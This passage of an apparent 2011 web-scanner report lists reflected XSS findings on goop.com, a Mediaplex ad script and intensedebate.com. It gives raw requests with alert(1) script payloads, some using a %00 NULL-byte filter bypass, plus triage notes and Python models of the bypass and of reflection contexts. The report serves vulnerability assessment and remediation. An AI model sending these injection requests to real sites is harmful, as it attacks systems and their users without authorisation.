<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/2034018270/x232110c"><script>alert(1)</script>f165b1bce56/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.16. http://goop.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://goop.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66a5c"><script>alert(1)</script>29cbc4784fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response below shows the sink: the page rebuilds the current query string into a link that appends &lan=en, copying parameter names into the href verbatim. Any parameter name will do, so there is no single vulnerable parameter to blocklist; the fix is to entity-encode the rebuilt query string (or to rebuild it only from known parameter names) before writing the attribute value.

Request

GET /?66a5c"><script>alert(1)</script>29cbc4784fc=1 HTTP/1.1
Host: goop.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 21:10:24 GMT
Server: Apache
Served-By: Joyent
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServergoop.com_http_pool=2720336906.20480.0000; path=/
Content-Length: 4970

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Con
...[SNIP]...
<a href="?66a5c"><script>alert(1)</script>29cbc4784fc=1&lan=en">
...[SNIP]...

1.17. http://goop.com/css/global.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://goop.com
Path:   /css/global.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c8ea7<script>alert(1)</script>7d0af9d8db0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The reflection point is the site's custom 404 page, which prints the requested URL inside a <b> element. The 404 status does not reduce exploitability: the body is served as text/html; charset=UTF-8 and the browser renders it like any other page. Because the path lands in character data rather than inside an attribute, no quote is needed to break out and a bare <script> element suffices. The same sink is behind findings 1.18 to 1.21.

Request

GET /cssc8ea7<script>alert(1)</script>7d0af9d8db0/global.css HTTP/1.1
Host: goop.com
Proxy-Connection: keep-alive
Referer: http://goop.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServergoop.com_http_pool=2720336906.20480.0000

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:11:05 GMT
Server: Apache
Served-By: Joyent
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 513

<html>
<head>
   <title> 404 Error Page</title>
</head>
<body style="text-align:center; background-color:#F7F7F7; ">
   <h2>Sorry... Page Not Found...</h2>
(Mon Jan 31 2011 9:11:05 pm GMT)

   <br><br>
   IP
...[SNIP]...
<b>goop.com/cssc8ea7<script>alert(1)</script>7d0af9d8db0/global.css</b>
...[SNIP]...

1.18. http://goop.com/css/global.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://goop.com
Path:   /css/global.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00a0a49<script>alert(1)</script>b01993571b7 was submitted in the REST URL parameter 2. This input was echoed as a0a49<script>alert(1)</script>b01993571b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Before reporting this as a WAF bypass, look at what the response below actually shows: the 404 page echoes the entire request path, including the literal %00, so the component that reflects it is printing the raw request URI without decoding it. The blocked-character explanation is the scanner's inference from the plain payload not reflecting at this position while the %00-prefixed one did. Reproduce both requests by hand and compare the responses (status, body, and which layer answers) to establish whether a native-code filter is really involved.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /css/global.css%00a0a49<script>alert(1)</script>b01993571b7 HTTP/1.1
Host: goop.com
Proxy-Connection: keep-alive
Referer: http://goop.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServergoop.com_http_pool=2720336906.20480.0000

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:11:38 GMT
Server: Apache
Served-By: Joyent
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 516

<html>
<head>
   <title> 404 Error Page</title>
</head>
<body style="text-align:center; background-color:#F7F7F7; ">
   <h2>Sorry... Page Not Found...</h2>
(Mon Jan 31 2011 9:11:38 pm GMT)

   <br><br>
   IP
...[SNIP]...
<b>goop.com/css/global.css%00a0a49<script>alert(1)</script>b01993571b7</b>
...[SNIP]...

1.19. http://goop.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://goop.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00e6684<script>alert(1)</script>43a55766fd0 was submitted in the REST URL parameter 1. This input was echoed as e6684<script>alert(1)</script>43a55766fd0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

As in the response for 1.18, the echoed path below contains the literal %00, so the sink is the 404 page printing the raw request URI. Confirm the blocked-character inference by hand (send the plain and the %00-prefixed payload and compare the responses) before reporting a WAF bypass.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /favicon.ico%00e6684<script>alert(1)</script>43a55766fd0 HTTP/1.1
Host: goop.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServergoop.com_http_pool=2720336906.20480.0000; __utmz=108318356.1296508226.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=108318356.340624538.1296508226.1296508226.1296508226.1; __utmc=108318356; __utmb=108318356.1.10.1296508226

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:11:43 GMT
Server: Apache
Served-By: Joyent
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 513

<html>
<head>
   <title> 404 Error Page</title>
</head>
<body style="text-align:center; background-color:#F7F7F7; ">
   <h2>Sorry... Page Not Found...</h2>
(Mon Jan 31 2011 9:11:43 pm GMT)

   <br><br>
   IP
...[SNIP]...
<b>goop.com/favicon.ico%00e6684<script>alert(1)</script>43a55766fd0</b>
...[SNIP]...

1.20. http://goop.com/js/AC_RunActiveContent.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://goop.com
Path:   /js/AC_RunActiveContent.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 810d7<script>alert(1)</script>33ccebc9f2e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js810d7<script>alert(1)</script>33ccebc9f2e/AC_RunActiveContent.js HTTP/1.1
Host: goop.com
Proxy-Connection: keep-alive
Referer: http://goop.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServergoop.com_http_pool=2720336906.20480.0000

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:11:04 GMT
Server: Apache
Served-By: Joyent
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 524

<html>
<head>
   <title> 404 Error Page</title>
</head>
<body style="text-align:center; background-color:#F7F7F7; ">
   <h2>Sorry... Page Not Found...</h2>
(Mon Jan 31 2011 9:11:04 pm GMT)

   <br><br>
   IP
...[SNIP]...
<b>goop.com/js810d7<script>alert(1)</script>33ccebc9f2e/AC_RunActiveContent.js</b>
...[SNIP]...

1.21. http://goop.com/js/AC_RunActiveContent.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://goop.com
Path:   /js/AC_RunActiveContent.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00b45ab<script>alert(1)</script>a4768d1993d was submitted in the REST URL parameter 2. This input was echoed as b45ab<script>alert(1)</script>a4768d1993d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

As in the responses for 1.18 and 1.19, the echoed path below contains the literal %00, so the sink is the 404 page printing the raw request URI. Confirm the blocked-character inference by hand (send the plain and the %00-prefixed payload and compare the responses) before reporting a WAF bypass.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /js/AC_RunActiveContent.js%00b45ab<script>alert(1)</script>a4768d1993d HTTP/1.1
Host: goop.com
Proxy-Connection: keep-alive
Referer: http://goop.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServergoop.com_http_pool=2720336906.20480.0000

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:11:28 GMT
Server: Apache
Served-By: Joyent
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 527

<html>
<head>
   <title> 404 Error Page</title>
</head>
<body style="text-align:center; background-color:#F7F7F7; ">
   <h2>Sorry... Page Not Found...</h2>
(Mon Jan 31 2011 9:11:28 pm GMT)

   <br><br>
   IP
...[SNIP]...
<b>goop.com/js/AC_RunActiveContent.js%00b45ab<script>alert(1)</script>a4768d1993d</b>
...[SNIP]...
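Added example, not the page's or any vendor's code: a model of the NULL-byte truncation that the remediation notes in 1.18, 1.19 and 1.21 describe. The blocklist, the two filter functions and the backend's 404 handler are assumptions made to illustrate the mechanism; the request paths are built from the scanner's payload in 1.18. It shows why a filter that matches on a C string misses everything after the decoded %00 while a length-aware filter does not, and why the backend still reflects the whole path.

```python
"""Model of the NULL-byte filter bypass described in the remediation notes.

A filter written in native code that hands the percent-decoded path to a
C-string routine (strstr, a regex over a char*) stops at the first 0x00
byte, so "%00" placed before "<script>" hides it. The backend that builds
the 404 page works on the whole string and reflects all of it, as the
responses in 1.18, 1.19 and 1.21 show (they even contain the literal %00).
Everything here is a model; no real WAF or server code is involved.
"""
from urllib.parse import unquote_to_bytes

# Assumed signature list for the modelled filter.
BLOCKLIST = (b"<script", b"javascript:", b"onerror=")

# Request paths built from the scanner's payload in finding 1.18.
PLAIN = "/css/global.css" + "a0a49<script>alert(1)</script>b01993571b7"
WITH_NUL = "/css/global.css%00" + "a0a49<script>alert(1)</script>b01993571b7"


def decode_path(raw_path):
    """Percent-decode the request path to bytes, as a filter would before matching."""
    return unquote_to_bytes(raw_path)


def native_filter_blocks(decoded):
    """Native-code model: only the bytes before the first NUL are ever compared."""
    visible = decoded.split(b"\x00", 1)[0].lower()
    return any(sig in visible for sig in BLOCKLIST)


def length_aware_filter_blocks(decoded):
    """Correct model: match against the whole buffer, NUL bytes included."""
    return any(sig in decoded.lower() for sig in BLOCKLIST)


def backend_reflects(raw_path):
    """The 404 handler from the report: echoes the raw request path into the body."""
    return "<b>goop.com%s</b>" % raw_path


def outcome(raw_path, filter_fn):
    """(blocked, script_reflected) for one request passed through one filter."""
    if filter_fn(decode_path(raw_path)):
        return True, False
    return False, "<script>" in backend_reflects(raw_path)
```

The same pair of requests (plain and %00-prefixed) is the manual check to run against the real host: if only the %00 variant reaches the 404 page, something in front of the application is reading the decoded path as a C string.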

1.22. http://img.mediaplex.com/content/0/15017/120648/2302-rsa-banner-728x90.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15017/120648/2302-rsa-banner-728x90.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7204"%3balert(1)//5086f535233 was submitted in the mpck parameter. This input was echoed as a7204";alert(1)//5086f535233 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Impact note: the response is served as application/x-javascript and, as the Referer shows, is loaded as an ad tag by a publisher page (www.scmagazineuk.com). Opening this URL directly in a browser displays the source and runs nothing; the injected statement executes in the origin of whichever page includes the script with these query parameters. The exposure is therefore on publisher pages whose ad tags carry attacker-influenced mpck or mpvc values (here they are built from the DoubleClick click-tracking URL), not on img.mediaplex.com itself, and the High severity should be read with that in mind.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15017/120648/2302-rsa-banner-728x90.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-120648-34880-0%3Fmpt%3D7163398a7204"%3balert(1)//5086f535233&mpt=7163398&mpvc=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3aa0/3/0/%2a/e%3B235326809%3B0-0%3B1%3B37997683%3B3454-728/90%3B40413144/40430931/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineuk.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo3=15017:34880/9609:2042/11606:17922/14302:28901/1551:17023/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:11:47 GMT
Server: Apache
Last-Modified: Thu, 20 Jan 2011 19:54:04 GMT
ETag: "43e67e-bfe-49a4c7ee56f00"
Accept-Ranges: bytes
Content-Length: 5698
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
<a href=\"http://ad.uk.doubleclick.net/click;h=v8/3aa0/3/0/*/e;235326809;0-0;1;37997683;3454-728/90;40413144/40430931/1;;~sscs=?http://altfarm.mediaplex.com/ad/ck/15017-120648-34880-0?mpt=7163398a7204";alert(1)//5086f535233\" target=\"_blank\">
...[SNIP]...
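Added example, not part of the report or of the scanner: a small reflection-context check that does by hand what the findings above describe for three contexts, a double-quoted HTML attribute (1.7 to 1.16), character data between tags (1.17 to 1.21) and a double-quoted JavaScript string (1.22 and 1.23). The sample bodies are constructed from the response fragments quoted in the report, trimmed and, for the JavaScript case, wrapped in the document.write() call the ad script uses; the context labels, the marker handling and the crude quote-state scan are this example's own, not the scanner's algorithm.

```python
"""Reflection-context check for the XSS findings above (added example).

Finds the region between the scanner's two random markers, works out which
syntactic context it landed in, and reports whether the one metacharacter
needed to break out of that context survived unencoded.
"""
import re

JS_TYPES = ("application/x-javascript", "application/javascript", "text/javascript")

# Metacharacter that must survive unencoded for each context to be exploitable.
BREAKOUT = {"attr_dquote": '"', "attr_squote": "'", "text": "<",
            "js_string_dquote": '"', "js_string_squote": "'"}


def find_reflection(body, prefix, suffix):
    """Span of text from the prefix marker to the end of the suffix marker, or None."""
    i = body.find(prefix)
    if i < 0:
        return None
    j = body.find(suffix, i + len(prefix))
    if j < 0:
        return None
    return i, j + len(suffix)


def html_context(before):
    """Classify a position in an HTML body from the text that precedes it."""
    lt, gt = before.rfind("<"), before.rfind(">")
    if lt <= gt:
        return "text"          # last tag was closed: character data
    tag = before[lt:]          # inside the tag opened at lt
    if tag.count('"') % 2:
        return "attr_dquote"
    if tag.count("'") % 2:
        return "attr_squote"
    return "tag"               # tag name or unquoted attribute


def js_context(before):
    """Classify a position in script text: open string literal or bare code."""
    state = None               # quote character of the currently open literal
    for m in re.finditer(r'(?<!\\)(["\'])', before):   # unescaped quotes only
        q = m.group(1)
        if state is None:
            state = q
        elif state == q:
            state = None
    return {'"': "js_string_dquote", "'": "js_string_squote", None: "js_code"}[state]


def classify(body, payload, prefix, suffix, content_type="text/html"):
    """Describe how the marker-wrapped payload was reflected into body."""
    span = find_reflection(body, prefix, suffix)
    if span is None:
        return {"reflected": False}
    start, end = span
    inner = body[start + len(prefix):end - len(suffix)]
    core = payload[len(prefix):len(payload) - len(suffix)]
    before = body[:start]
    ctx = js_context(before) if content_type.startswith(JS_TYPES) else html_context(before)
    needed = BREAKOUT.get(ctx)
    if needed is None:
        breakout = False
    elif ctx.startswith("js_string"):
        # A backslash-escaped quote does not terminate a JS string literal.
        breakout = re.search(r"(?<!\\)" + re.escape(needed), inner) is not None
    else:
        breakout = needed in inner
    return {"reflected": True, "context": ctx, "verbatim": inner == core, "breakout": breakout}


# Constructed sample bodies, cut down from the fragments quoted in 1.7, 1.17
# and 1.22; "encoded" is what 1.7 should look like once the server encodes it.
SAMPLES = {
    "attr": dict(payload='ca2f4"><script>alert(1)</script>09dd599035', prefix="ca2f4", suffix="09dd599035",
                 body='<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMca2f4"><script>alert(1)</script>09dd599035/2010DM/x23?x" target="_top">'),
    "text": dict(payload="c8ea7<script>alert(1)</script>7d0af9d8db0", prefix="c8ea7", suffix="7d0af9d8db0",
                 body="<b>goop.com/cssc8ea7<script>alert(1)</script>7d0af9d8db0/global.css</b>"),
    "js": dict(payload='a7204";alert(1)//5086f535233', prefix="a7204", suffix="5086f535233",
               content_type="application/x-javascript",
               body='document.write( "<script type=\\"text/javascript\\" SRC=\\"http://img-cdn.mediaplex.com/0/documentwrite.js\\"><"+"/script>");\n'
                    'document.write("<a href=\\"http://altfarm.mediaplex.com/ad/ck/15017-120648-34880-0?mpt=7163398a7204";alert(1)//5086f535233\\" target=\\"_blank\\">");'),
    "encoded": dict(payload='ca2f4"><script>alert(1)</script>09dd599035', prefix="ca2f4", suffix="09dd599035",
                    body='<A HREF="/x/ca2f4&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;09dd599035">'),
}


def run_samples():
    """Classify every sample; returns {name: result dict}."""
    return {name: classify(**args) for name, args in SAMPLES.items()}
```

The "verbatim" flag is the scanner's "echoed unmodified"; "breakout" is the part that actually matters for triage, since a payload can be reflected verbatim into a context where its metacharacters are inert, and an encoded reflection (the "encoded" sample) is the outcome a fix should produce.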

1.23. http://img.mediaplex.com/content/0/15017/120648/2302-rsa-banner-728x90.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15017/120648/2302-rsa-banner-728x90.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abd4e"%3balert(1)//d8d83967ba2 was submitted in the mpvc parameter. This input was echoed as abd4e";alert(1)//d8d83967ba2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

As with the mpck parameter, the resource is served as application/x-javascript and does nothing when opened directly; the injected statement only runs in a page that includes this ad script with the crafted query string. Here the value lands inside the FlashVars clickTAG written by document.write, but the break-out is the same: the unescaped quotation mark ends the JavaScript string literal before the Flash parameter is ever parsed.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15017/120648/2302-rsa-banner-728x90.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-120648-34880-0%3Fmpt%3D7163398&mpt=7163398&mpvc=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3aa0/3/0/%2a/e%3B235326809%3B0-0%3B1%3B37997683%3B3454-728/90%3B40413144/40430931/1%3B%3B%7Esscs%3D%3fabd4e"%3balert(1)//d8d83967ba2 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineuk.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo3=15017:34880/9609:2042/11606:17922/14302:28901/1551:17023/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:11:49 GMT
Server: Apache
Last-Modified: Thu, 20 Jan 2011 19:54:04 GMT
ETag: "43e67e-bfe-49a4c7ee56f00"
Accept-Ranges: bytes
Content-Length: 5674
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=http://ad.uk.doubleclick.net/click;h=v8/3aa0/3/0/*/e;235326809;0-0;1;37997683;3454-728/90;40413144/40430931/1;;~sscs=?abd4e";alert(1)//d8d83967ba2http://altfarm.mediaplex.com%2Fad%2Fck%2F15017-120648-34880-0%3Fmpt%3D7163398&clickTag=http://ad.uk.doubleclick.net/click;h=v8/3aa0/3/0/*/e;235326809;0-0;1;37997683;3454-728/90;40413144/40430931/1;;~ss
...[SNIP]...

1.24. http://intensedebate.com/comment/dd5b14065e2bc9e2bfced67832069618/generic/73522711 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /comment/dd5b14065e2bc9e2bfced67832069618/generic/73522711

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3765f'><script>alert(1)</script>d66da1f0de2 was submitted in REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comment3765f'><script>alert(1)</script>d66da1f0de2/dd5b14065e2bc9e2bfced67832069618/generic/73522711 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:11:21 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4751

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/comment3765f'><script>alert(1)</script>d66da1f0de2/dd5b14065e2bc9e2bfced67832069618/generic/73522711'>
...[SNIP]...

1.25. http://intensedebate.com/empty.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /empty.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d43c7'><script>alert(1)</script>b83048b6d9a was submitted in REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /empty.phpd43c7'><script>alert(1)</script>b83048b6d9a HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:11:21 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4701

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/empty.phpd43c7'><script>alert(1)</script>b83048b6d9a'>
...[SNIP]...

1.26. http://intensedebate.com/empty.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /empty.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 103fc'><script>alert(1)</script>64edd2460e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /empty.php/103fc'><script>alert(1)</script>64edd2460e8 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:11:21 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4699

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/empty.php/103fc'><script>alert(1)</script>64edd2460e8'>
...[SNIP]...

1.27. http://intensedebate.com/fb-connect/fbConnect.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
